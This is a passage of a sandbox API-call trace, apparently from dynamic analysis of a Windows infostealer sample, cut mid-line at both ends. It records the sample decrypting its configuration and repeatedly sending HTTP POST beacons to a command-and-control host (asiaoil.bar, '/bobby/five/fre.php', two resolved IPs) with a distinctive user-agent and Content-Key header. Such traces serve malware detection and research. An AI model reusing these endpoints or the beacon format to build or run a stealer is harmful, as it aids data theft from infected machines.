hHeap=0x740000, dwFlags=0x0, lpMem=0x75eaa0 | out: hHeap=0x740000) returned 1 [0269.632] GetProcessHeap () returned 0x740000 [0269.632] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562c0 | out: hHeap=0x740000) returned 1 [0269.632] closesocket (s=0x270) returned 0 [0269.633] GetProcessHeap () returned 0x740000 [0269.633] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b620 | out: hHeap=0x740000) returned 1 [0269.633] GetProcessHeap () returned 0x740000 [0269.633] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766360 | out: hHeap=0x740000) returned 1 [0269.634] GetProcessHeap () returned 0x740000 [0269.634] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0269.634] GetProcessHeap () returned 0x740000 [0269.634] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf30 | out: hHeap=0x740000) returned 1 [0269.634] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x75ca78, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x22c) returned 0x270 [0269.636] Sleep (dwMilliseconds=0xea60) [0280.960] GetProcessHeap () returned 0x740000 [0280.961] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763d28 [0280.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0280.977] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.094] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x756098) returned 1 [0281.203] GetProcessHeap () returned 0x740000 [0281.204] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0281.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.205] CryptImportKey (in: hProv=0x756098, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0281.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.206] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.208] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.208] GetProcessHeap () returned 0x740000 [0281.208] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0281.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.329] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763d28, pdwDataLen=0x19fcfc | out: pbData=0x763d28, pdwDataLen=0x19fcfc) returned 1 [0281.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.523] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0281.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.525] CryptReleaseContext (hProv=0x756098, dwFlags=0x0) returned 1 [0281.525] GetProcessHeap () returned 0x740000 [0281.525] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0281.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0281.526] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0281.528] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0281.636] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0281.638] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.638] GetProcessHeap () returned 0x740000 [0281.638] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0281.645] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.646] GetProcessHeap () returned 0x740000 [0281.647] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0281.647] GetProcessHeap () returned 0x740000 [0281.647] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0281.647] GetProcessHeap () returned 0x740000 [0281.647] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0281.647] GetProcessHeap () returned 0x740000 [0281.647] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763938 [0281.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.649] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.656] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x756098) returned 1 [0281.664] GetProcessHeap () returned 0x740000 [0281.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758538 [0281.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.666] CryptImportKey (in: hProv=0x756098, pbData=0x758538, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0281.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.740] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.741] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.741] GetProcessHeap () returned 0x740000 [0281.742] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758538 | out: hHeap=0x740000) returned 1 [0281.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.743] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0281.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.744] CryptDestroyKey (hKey=0x74d768) returned 1 [0281.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0281.745] CryptReleaseContext (hProv=0x756098, dwFlags=0x0) returned 1 [0281.745] GetProcessHeap () returned 0x740000 [0281.745] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0281.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0281.746] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0281.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0281.747] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0281.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0281.748] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0281.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0281.750] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0281.750] GetProcessHeap () returned 0x740000 [0281.750] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0281.750] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c020*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0282.074] GetProcessHeap () returned 0x740000 [0282.074] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0282.074] socket (af=2, type=1, protocol=6) returned 0x274 [0282.075] connect (s=0x274, name=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0282.203] FreeAddrInfoW (pAddrInfo=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c020*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0282.204] GetProcessHeap () returned 0x740000 [0282.204] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cc38 [0282.204] GetProcessHeap () returned 0x740000 [0282.204] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0282.205] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0282.206] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0282.206] GetProcessHeap () returned 0x740000 [0282.206] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x7562c0 [0282.206] GetProcessHeap () returned 0x740000 [0282.207] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0282.207] GetProcessHeap () returned 0x740000 [0282.207] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763aa0 [0282.207] GetProcessHeap () returned 0x740000 [0282.207] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0282.207] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0282.208] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0282.208] GetProcessHeap () returned 0x740000 [0282.208] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x762298 [0282.208] GetProcessHeap () returned 0x740000 [0282.209] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0282.209] send (s=0x274, buf=0x762298*, len=243, flags=0) returned 243 [0282.209] send (s=0x274, buf=0x761fd0*, len=159, flags=0) returned 159 [0282.210] GetProcessHeap () returned 0x740000 [0282.210] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x75da80 [0282.210] recv (in: s=0x274, buf=0x75da80, len=4048, flags=0 | out: buf=0x75da80*) returned 565 [0282.337] GetProcessHeap () returned 0x740000 [0282.338] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x762298 | out: hHeap=0x740000) returned 1 [0282.338] GetProcessHeap () returned 0x740000 [0282.338] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763aa0 | out: hHeap=0x740000) returned 1 [0282.338] GetProcessHeap () returned 0x740000 [0282.338] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562c0 | out: hHeap=0x740000) returned 1 [0282.338] GetProcessHeap () returned 0x740000 [0282.339] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cc38 | out: hHeap=0x740000) returned 1 [0282.339] closesocket (s=0x274) returned 0 [0282.340] GetProcessHeap () returned 0x740000 [0282.340] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0282.340] GetProcessHeap () returned 0x740000 [0282.340] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0282.340] GetProcessHeap () returned 0x740000 [0282.340] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0282.340] GetProcessHeap () returned 0x740000 [0282.340] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0282.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x75da80, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x694) returned 0x274 [0282.343] Sleep (dwMilliseconds=0xea60) [0292.344] GetProcessHeap () returned 0x740000 [0292.344] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7638a8 [0292.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d650) returned 1 [0292.559] GetProcessHeap () returned 0x740000 [0292.559] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0292.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.560] CryptImportKey (in: hProv=0x75d650, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0292.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.561] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.562] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.562] GetProcessHeap () returned 0x740000 [0292.563] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0292.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.654] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7638a8, pdwDataLen=0x19fcfc | out: pbData=0x7638a8, pdwDataLen=0x19fcfc) returned 1 [0292.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.655] CryptDestroyKey (hKey=0x74d768) returned 1 [0292.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.655] CryptReleaseContext (hProv=0x75d650, dwFlags=0x0) returned 1 [0292.655] GetProcessHeap () returned 0x740000 [0292.656] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0292.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0292.657] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0292.657] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0292.658] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0292.659] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.659] GetProcessHeap () returned 0x740000 [0292.659] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0292.659] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0292.660] GetProcessHeap () returned 0x740000 [0292.660] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0292.660] GetProcessHeap () returned 0x740000 [0292.661] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0292.661] GetProcessHeap () returned 0x740000 [0292.661] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7638a8 | out: hHeap=0x740000) returned 1 [0292.661] GetProcessHeap () returned 0x740000 [0292.661] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763a10 [0292.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.662] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d4b8) returned 1 [0292.674] GetProcessHeap () returned 0x740000 [0292.674] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0292.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.675] CryptImportKey (in: hProv=0x75d4b8, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0292.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.750] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.751] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.751] GetProcessHeap () returned 0x740000 [0292.751] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0292.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.752] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763a10, pdwDataLen=0x19fcfc | out: pbData=0x763a10, pdwDataLen=0x19fcfc) returned 1 [0292.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.753] CryptDestroyKey (hKey=0x74d768) returned 1 [0292.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0292.754] CryptReleaseContext (hProv=0x75d4b8, dwFlags=0x0) returned 1 [0292.754] GetProcessHeap () returned 0x740000 [0292.754] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0292.754] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0292.755] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0292.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0292.756] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0292.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0292.757] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0292.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0292.758] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0292.758] GetProcessHeap () returned 0x740000 [0292.758] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf30 [0292.758] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c460*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0292.761] GetProcessHeap () returned 0x740000 [0292.761] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b590 [0292.761] socket (af=2, type=1, protocol=6) returned 0x278 [0292.762] connect (s=0x278, name=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0292.915] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c460*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0292.915] GetProcessHeap () returned 0x740000 [0292.915] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cee0 [0292.915] GetProcessHeap () returned 0x740000 [0292.915] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0292.916] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0292.916] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0292.916] GetProcessHeap () returned 0x740000 [0292.916] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x7562c0 [0292.916] GetProcessHeap () returned 0x740000 [0292.917] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0292.960] GetProcessHeap () returned 0x740000 [0292.960] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x7636f8 [0292.960] GetProcessHeap () returned 0x740000 [0292.960] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0292.961] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0292.962] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0292.962] GetProcessHeap () returned 0x740000 [0292.962] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747868 [0292.962] GetProcessHeap () returned 0x740000 [0292.963] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0292.963] send (s=0x278, buf=0x747868*, len=243, flags=0) returned 243 [0292.963] send (s=0x278, buf=0x761fd0*, len=159, flags=0) returned 159 [0292.963] GetProcessHeap () returned 0x740000 [0292.963] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x75da80 [0292.963] recv (in: s=0x278, buf=0x75da80, len=4048, flags=0 | out: buf=0x75da80*) returned 579 [0293.106] GetProcessHeap () returned 0x740000 [0293.106] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0293.106] GetProcessHeap () returned 0x740000 [0293.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7636f8 | out: hHeap=0x740000) returned 1 [0293.107] GetProcessHeap () returned 0x740000 [0293.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562c0 | out: hHeap=0x740000) returned 1 [0293.107] GetProcessHeap () returned 0x740000 [0293.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cee0 | out: hHeap=0x740000) returned 1 [0293.107] closesocket (s=0x278) returned 0 [0293.108] GetProcessHeap () returned 0x740000 [0293.108] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b590 | out: hHeap=0x740000) returned 1 [0293.108] GetProcessHeap () returned 0x740000 [0293.109] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: 